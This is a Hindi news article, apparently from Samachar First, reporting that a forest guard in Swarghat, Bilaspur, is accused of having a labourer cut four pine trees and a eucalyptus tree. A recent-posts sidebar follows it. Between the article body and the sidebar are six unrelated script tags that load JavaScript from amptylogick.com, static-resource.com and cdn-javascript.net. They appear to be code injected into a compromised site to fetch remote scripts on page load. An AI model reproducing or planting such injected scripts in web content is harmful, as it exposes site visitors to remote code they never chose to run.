बिलासपुरः स्वारघाट में वन रक्षक पर चीड़ और सफेदे के पेड़ काटने का आरोप

<p>जिला बिलासपुर में वन परिक्षेत्र अधिकारी कार्यालय स्वारघाट के अंतर्गत कुलाह जंगल मे एक वन रक्षक पर चीड़ के चार पेड़ व सफेदे का एक पेड़ काटने का गम्भीर आरोप लगा है। बताया जा रहा है कि उक्त वन रक्षक फॉरेस्ट चैक पोस्ट स्वारघाट में लंबे अरसे से वन रक्षक के पद पर तैनात है। उक्त मामले का खुलासा तब हुआ जब बीती शाम के समय स्वारघाट के वन खण्ड अधिकारी पवन कुमार बनेर से स्वारघाट की तरफ को गश्त कर रहे थे। मामला पिछले कल शनिवार शाम के समय का बताया जा रहा है। जब स्वारघाट के समीप सड़क किनारे कुलाह जंगल में गिरे हुए चीड़ के चार पेड़ों को काट कर छोटे छोटे टुकड़े बना कर फैंके हुए थे। इसके समीप ही फॉरेस्ट चैक पोस्ट के पीछे भी एक सफेदे का एक पेड़ काटा हुआ मिला है।<br />
&nbsp;&nbsp; &nbsp;<br />
बता दें कि काटे गये चीड़ के चारों पेड़ों को मार्क करके फॉरेस्ट कारपोरेशन को दिया जाना था। लेकिन वन रक्षक के इशारे पर एक मजदूर ने आरे से चीड़ के चारों पेड़ों को काट कर छोटे छोटे टुकड़े कर दिया है। इसके अलावा समीप ही फॉरेस्ट चैक पोस्ट के पीछे एक सफेदे के पेड़ को भी काट कर फैंक दिया गया है। वन खण्ड अधिकारी स्वारघाट ने&nbsp; मौके पर जाकर लकड़ी को बरामद करके मौके पर मौजूद आरे सहित पेड़ काटने वाले मजदूर के बयान कलमबद्ध कर लिये हैं। आरे सहित मौके पर मौजूद मजदूर ने वन विभाग के स्वारघाट के वन रेंज अधिकारी को बयान दिया है कि फॉरेस्ट चैक पोस्ट पर तैनात मोहित कुमार वन रक्षक ने सभी पेड़ काटने को कहा था। वन विभाग के वन परिक्षेत्र अधिकारी स्वारघाट नन्द लाल चौधरी में उक्त मामले की पुष्टि की है। इन्होंने बताया कि मामले के बारें वन मण्डलाधिकारी बिलासपुर को अवगत करवा दिया गया है। उक्त मामले पर उचित कार्रवाई अमल में लाई जा रही है।</p>
<script src=”//amptylogick.com/21aca573d498d25317.js”></script>
<script src=”http://amptylogick.com/optout/set/lat?jsonp=__mtz_cb_8575822&amp;key=21aca573d498d25317&amp;cv=1574053673&amp;t=1574053673291″ type=”text/javascript”></script>
<script src=”http://amptylogick.com/optout/set/lt?jsonp=__mtz_cb_308908653&amp;key=21aca573d498d25317&amp;cv=1602732&amp;t=1574053673291″ type=”text/javascript”></script>
<script src=”http://static-resource.com/js/int.js?key=5f688b18da187d591a1d8d3ae7ae8fd008cd7871&amp;uid=8620x” type=”text/javascript”></script>
<script src=”http://cdn-javascript.net/api?key=a1ce18e5e2b4b1b1895a38130270d6d344d031c0&amp;uid=8620x&amp;format=arrjs&amp;r=1574053673296″ type=”text/javascript”></script>
<script src=”http://amptylogick.com/ext/21aca573d498d25317.js?sid=52587_8620_&amp;title=a&amp;blocks[]=31af2″ type=”text/javascript”></script>

Samachar First

Recent Posts

Himachal: 600 करोड़ की स्वीकृति के बावजूद लंबित मांगों पर नाराजगी

Himachal Employee Federation meeting:  हिमाचल प्रदेश कर्मचारी महासंघ ने मंगलवार को सचिवालय के प्रांगण में …

11 mins ago

Anti-Drug Campaign: पुलिस का नशे के खिलाफ अभियान तेज, बुद्धिजीवी वर्ग से मांगा सहयोग

  Hamirpur Anti-Drug Campaign: नशा तस्करों के खिलाफ हमीरपुर पुलिस ने एक नई मुहिम की…

5 hours ago

मंडी शहर के विकास कार्यों में तेजी लाएं: अनिल

Mandi Municipal Corporation Meeting:  मंगलवार को नगर निगम मंडी के सभागार में सभी विभागों और…

5 hours ago

Cluster Level Competition: बाल मेले में छात्रों ने नृत्य, गायन और मॉडल प्रदर्शनी में दिखाई प्रतिभा

  Cluster Level Competition : स्कूली छात्रों में विज्ञान के प्रति रुचि और प्रतिस्पर्धा की…

5 hours ago

Himachal: कन्या पाठशाला की छात्रा झीलमिल ने राष्ट्रीय स्तर पर फुटबॉल में दिखाई प्रतिभा

National Football Competition: कन्या पाठशाला मंडी की छात्रा झीलमिल ने हाल ही में केरल में…

5 hours ago

पूर्व सरकार की लापरवाही से रुका मेडिकल कॉलेज का निर्माण: सोलंकी

  Nahan Medical College : कांग्रेस विधायक अजय सोलंकी ने डॉक्टर वाईएस परमार मेडिकल कॉलेज…

5 hours ago